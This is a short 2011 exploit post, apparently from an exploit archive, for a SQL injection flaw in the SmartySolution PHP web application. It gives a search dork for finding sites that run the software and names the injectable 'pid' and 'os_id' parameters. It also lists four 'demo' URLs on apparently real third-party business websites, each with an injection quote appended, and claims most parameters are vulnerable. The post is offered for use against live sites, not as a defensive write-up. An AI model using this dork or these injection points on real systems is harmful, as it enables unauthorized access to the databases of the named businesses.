SmartySolution Sql Injection Vulnerability

2011-06-06T00:00:00
ID 1337DAY-ID-16268
Type zdt
Reporter Anas
Modified 2011-06-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+] Exploit Title : SmartySolution Sql injection
[+] Date : 06 June 2011
[+] Author : Anas
[+] Category : WebApps
[+] d0rk : "by www.SmartySolution.com.au"
[+] Facebook : http://www.facebook.com/profile.php?id=100000442288288
[+] Tested on : Windows Xp SP3

#########################################################

http://localhost/container.php?content=smnuContent&os_id= Sql here

http://localhost/container.php?pid= sql here

#########################################################

Demos : 

http://www.uniglazewindows.com/container.php?pid=4'

http://www.goldcoastkids.com.au/container.php?content=smnuContent&os_id=13'

http://www.brisbanekids.com.au/container.php?content=generalContent&pid=5'

http://www.ringworldwide.com.au/container.php?area=common&action=payment_refund'

 Check all .php?*= , mostly all vul.. to sqli.! 

# (^_^) ! Good Luck ALL ...

Greetz To : Tn-V!rus - s-man - ahmdosa - kodak - Ali - all my friends and Tunisian Hackers !

Proud to be TUNISIAN



#  0day.today [2018-02-17]  #